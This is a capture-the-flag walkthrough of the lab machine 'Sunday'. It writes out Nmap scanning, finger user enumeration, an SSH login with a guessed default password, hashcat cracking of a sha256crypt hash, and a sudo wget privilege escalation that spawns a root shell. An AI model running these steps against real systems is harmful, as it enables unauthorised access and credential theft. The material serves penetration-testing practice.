Ping
Nmap Scans
mapit 10.10.10.76
Nmap Default Scan
Nmap Service and Script Scan
Nmap All Port Scan
Script and Service scan for Newly found ports
On Port 6787 https://10.10.10.76:6787
Will Enumerate Port 79 Fingers, Check the site for more info https://book.hacktricks.xyz/network-services-pentesting/pentesting-finger
finger @10.10.10.76
finger admin@10.10.10.76
Finger root@10.10.10.76
Get the Perl Script from this link https://github.com/pentestmonkey/finger-user-enum/blob/master/finger-user-enum.pl to enumerate finger
User Enumeration
perl finger.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76
Will try ssh to sunny
ssh sunny@10.10.10.76 -p 22022
We have to try default Passwords like and box name as a password, admin, root, username as password.
In this case box name is the password sunny:sunday
Will first read history file
Will check the backup file
We Try to decrypt this password of Sammy
Found Hash type it is sha256crypt
Will decrypt this using Hashcat
hashcat --help | grep -i "sha256crypt"
Found the mode, it is 7400
Will crack it now, I have saved the hash of sammy in file named hash
hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt --force
Found it…! sammy:cooldude!
Will change our shell to sammy now
su sammy
Will jump to Privilege Escalation…!
Will check our sudo privileges
sudo -l
We can execute wget with sudo, will check is there any way to escalate or privileges with in GTFObins https://gtfobins.github.io/gtfobins/wget/#sudo
Will run this
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sudo wget --use-askpass=$TF 0
We A3r r0o!…:)
Will get flags Now
User.txt
root.txt
Done With Sunday…:)